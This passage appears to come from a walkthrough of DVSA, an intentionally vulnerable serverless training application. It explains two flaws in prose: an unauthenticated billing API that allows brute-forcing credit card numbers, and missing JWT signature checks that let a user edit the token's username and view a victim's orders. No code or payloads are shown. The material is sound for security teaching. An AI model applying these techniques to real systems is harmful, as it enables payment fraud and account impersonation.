The DVSA uses a designated API call to process billing requests. However, the API is open to any call without authentication.
This allows malicious users to brute-force credit card numbers using the payment processing API:
The DVSA uses AWS Cognito for authentication. The authorization header is a JSON Web Token (JWT) which holds all the user's information. However, the application does not verify the signature of the JWT and it is therefore possible to send requests and impersonate other users.
For example, sending the {"action": "orders"} request returns an user's orders:
If we decode the Authorization header, we get our own auth token:
But, if we take the middle part, decode it with base, replace the username with the victim's username and re-encode it, we get:
Sending the request now, will give us the orders of the victim:
